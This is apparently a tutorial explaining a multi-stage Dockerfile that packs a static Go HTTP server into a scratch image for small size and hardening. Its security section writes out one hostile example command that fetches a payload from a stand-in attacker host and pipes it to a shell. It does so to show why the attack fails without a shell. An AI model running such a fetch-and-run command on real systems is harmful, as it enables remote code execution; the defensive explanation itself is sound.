Multi-Stage Docker Builds with Scratch: Maximum Efficiency, Minimum Attack Surface
Most Docker images ship hundreds of megabytes of operating system you never asked for. Package managers, shells, utilities, shared libraries — all sitting there doing nothing except expanding your attack surface. There is a better way.
This guide breaks down a real-world Dockerfile from the K3s Node Info HTTP Server project and explains exactly why it produces an image that is both extremely small and extremely hardened.
The Dockerfile
FROM golang:1.22-alpine AS builder
WORKDIR /app
COPY go.mod .
RUN go mod download
COPY main.go .
RUN CGO_ENABLED=0 GOOS=linux go build -o server
FROM scratch
WORKDIR /
COPY --from=builder /app/server /server
EXPOSE 8080
ENTRYPOINT ["/server"]
That is the entire thing. Every line is intentional. Let's walk through what makes it work.
Multi-stage builds
A multi-stage build uses more than one FROM instruction. Each FROM starts a new stage with its own filesystem. Only what you explicitly COPY --from= into the final stage ends up in the image you ship.
┌──────────────────────────────┐
│ Stage 1: builder │
│ golang:1.22-alpine (~250MB) │
│ - Go toolchain │
│ - Source code │
│ - Dependencies │
│ - Compiled binary ← this │
└──────────┬───────────────────┘
│ COPY --from=builder
▼
┌──────────────────────────────┐
│ Stage 2: final image │
│ scratch (0 bytes) │
│ - /server binary (~5-10MB) │
│ - Nothing else │
└──────────────────────────────┘
The Go toolchain, the Alpine packages, the source code, the module cache — all of it stays behind in the builder stage. It is never included in the final image. Docker discards the builder stage entirely after the build completes.
Why this matters
Without multi-stage builds you have two bad options:
- Ship the toolchain — your image includes the entire Go SDK, hundreds of megabytes of binaries you will never run in production.
- Build outside Docker — you compile on your host and
COPYthe binary in. This breaks reproducibility and ties your CI pipeline to a specific OS and Go version.
Multi-stage gives you the best of both worlds: a reproducible build environment that produces a minimal output.
Why scratch
scratch is Docker's empty image. It contains nothing — no filesystem, no shell, no libc, no /etc/passwd, no package manager. It is literally zero bytes.
docker images scratch
# REPOSITORY TAG IMAGE ID CREATED SIZE
# scratch latest ... ... 0B
When you FROM scratch, your final image contains only the files you copy in. In this case that is a single binary: /server.
What scratch does not have
| Missing | Security implication |
|---|---|
Shell (/bin/sh) |
An attacker who gets code execution cannot drop into a shell |
| Package manager | No apt-get install or apk add to pull in tools |
| libc / shared libs | No dynamic library hijacking via LD_PRELOAD |
/etc/passwd |
No user accounts to impersonate or escalate through |
Utilities (curl, wget, nc) |
No built-in tools for data exfiltration or lateral movement |
/tmp directory |
No writable temp space for staging payloads |
Every one of those missing components is a door that does not exist. You cannot exploit what is not there.
Image size comparison
| Base image | Approximate final size |
|---|---|
ubuntu:22.04 |
~77 MB + your binary |
debian:bookworm-slim |
~74 MB + your binary |
alpine:3.19 |
~7 MB + your binary |
scratch |
Your binary only (~5-10 MB) |
A scratch-based Go image is typically 10-15x smaller than the same binary on Ubuntu.
Static compilation with CGO_ENABLED=0
This is the line that makes scratch possible:
RUN CGO_ENABLED=0 GOOS=linux go build -o server
CGO_ENABLED=0
By default, Go's net package and a few others use cgo to call into the system's C library (libc). That creates a dynamic binary that requires shared libraries at runtime — libraries that scratch does not have.
Setting CGO_ENABLED=0 tells the Go compiler to use pure-Go implementations for everything. The result is a fully static binary with zero external dependencies.
# With CGO_ENABLED=1 (default):
ldd server
# linux-vdso.so.1
# libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6
# ...
# With CGO_ENABLED=0:
ldd server
# not a dynamic executable
A statically compiled binary runs anywhere Linux is — including on an empty filesystem.
GOOS=linux
This explicitly sets the compilation target to Linux, regardless of what OS the build runs on. If someone builds this Dockerfile from macOS or Windows (via Docker Desktop), the binary will still be a Linux ELF executable. This is declarative and leaves nothing to chance.
Layer caching strategy
COPY go.mod .
RUN go mod download
COPY main.go .
This ordering is deliberate. Docker caches each layer, and a layer is only rebuilt when its inputs change.
COPY go.mod .— changes rarely (only when dependencies change)RUN go mod download— downloads dependencies; cached as long asgo.modhasn't changedCOPY main.go .— changes frequently (every code edit)
If you only change main.go, Docker reuses the cached dependency layer and skips the download entirely. On a project with many dependencies this saves minutes per build.
If you did it the naive way:
# Bad: any change to source code invalidates the dependency cache
COPY . .
RUN go mod download && go build -o server
Every code change would re-download every dependency. The two-step approach keeps builds fast during development.
Alpine as the builder base
FROM golang:1.22-alpine AS builder
The builder uses golang:1.22-alpine rather than the full golang:1.22 image. Alpine-based images are significantly smaller:
| Builder image | Size |
|---|---|
golang:1.22 |
~800 MB |
golang:1.22-alpine |
~250 MB |
This does not affect the final image (the builder is discarded), but it reduces:
- Pull time in CI/CD — less data to download on every pipeline run
- Disk usage — especially on build servers running many jobs
- Build startup time — smaller layers decompress faster
Since the final binary is statically compiled, using Alpine as the builder has no downside.
ENTRYPOINT vs CMD
ENTRYPOINT ["/server"]
The Dockerfile uses ENTRYPOINT in exec form (JSON array), not CMD. This matters for two reasons:
- Exec form runs the binary directly as PID 1 — no shell wrapper, no
/bin/sh -c. Since scratch has no shell,ENTRYPOINT /server(shell form) would fail. The exec form avoids this entirely. - Signal handling — when the binary is PID 1, it receives
SIGTERMdirectly from Docker during container stop. This allows the application to handle graceful shutdown without relying on a shell to forward signals.
Security analysis
Zero CVEs by default
Container vulnerability scanners (Trivy, Grype, Snyk) work by scanning installed OS packages against known vulnerability databases. A scratch image has no packages. The scan result is always clean — not because vulnerabilities are hidden, but because the attack surface genuinely does not exist.
trivy image your-scratch-image:latest
# Total: 0 (UNKNOWN: 0, LOW: 0, MEDIUM: 0, HIGH: 0, CRITICAL: 0)
Compare that to a typical Ubuntu-based image which can carry dozens of known CVEs from packages you never use.
No shell access
If an attacker exploits a vulnerability in your Go application and achieves remote code execution, the first thing they typically do is spawn a shell:
/bin/sh -c "curl attacker.com/payload | sh"
On scratch, this fails immediately. There is no /bin/sh. There is no curl. There is no sh. The attacker's standard playbook is dead on arrival.
No privilege escalation path
With no su, no sudo, no user database, no setuid binaries, and no writable system directories, the paths to privilege escalation that work on traditional images simply do not exist here.
No supply chain bloat
Every package in a base image is a dependency you did not write and may not audit. Each one can introduce vulnerabilities, and each one needs patching. With scratch, your supply chain is:
- The Go standard library (reviewed, well-tested)
- Your application code
- Your
go.moddependencies
That is it. No hidden transitive OS dependencies.
When scratch is not the right choice
Scratch is not universally applicable. It works here because Go produces self-contained static binaries. Consider alternatives when:
- Your language needs a runtime — Python, Node.js, Java, and Ruby all need interpreters or VMs. Use distroless or Alpine instead.
- You need TLS with custom CA certificates — scratch has no
/etc/ssl/certs. You canCOPYa CA bundle in, or use Google's distroless images which include certificates. - You need timezone data — Go's
timepackage needs tzdata fortime.LoadLocation(). You can embed it at build time with-tags timetzdataor copy/usr/share/zoneinfofrom the builder. - You need debugging access — with no shell, you cannot
docker execinto the container. For debugging, build a second image variant usingalpineas the base.
For this specific use case — a simple HTTP server written in Go — scratch is the ideal choice.
Building and running
git clone https://github.com/InfraFort/K3s-Node-Info-HTTP-Server.git
cd K3s-Node-Info-HTTP-Server
docker build -t node-info-server .
docker run -p 8080:8080 node-info-server
Check the image size:
docker images node-info-server
# REPOSITORY TAG IMAGE ID CREATED SIZE
# node-info-server latest ... ... ~6 MB
Approximately 6 MB for a fully functional HTTP server. No wasted space, no unnecessary risk.
Summary
Every design choice in this Dockerfile serves a purpose:
| Decision | Benefit |
|---|---|
| Multi-stage build | Build tools never reach production |
scratch base |
Zero OS, zero attack surface |
CGO_ENABLED=0 |
Static binary, no libc dependency |
GOOS=linux |
Explicit target, reproducible across platforms |
Separate go.mod copy |
Fast rebuilds via layer caching |
golang:1.22-alpine builder |
Smaller builder, faster CI pulls |
ENTRYPOINT exec form |
Direct PID 1, proper signal handling, no shell needed |
The result is a container image that is small enough to deploy anywhere, fast enough to start in milliseconds, and hardened enough that most standard attack vectors do not apply. If your application can compile to a static binary, this is the pattern to follow.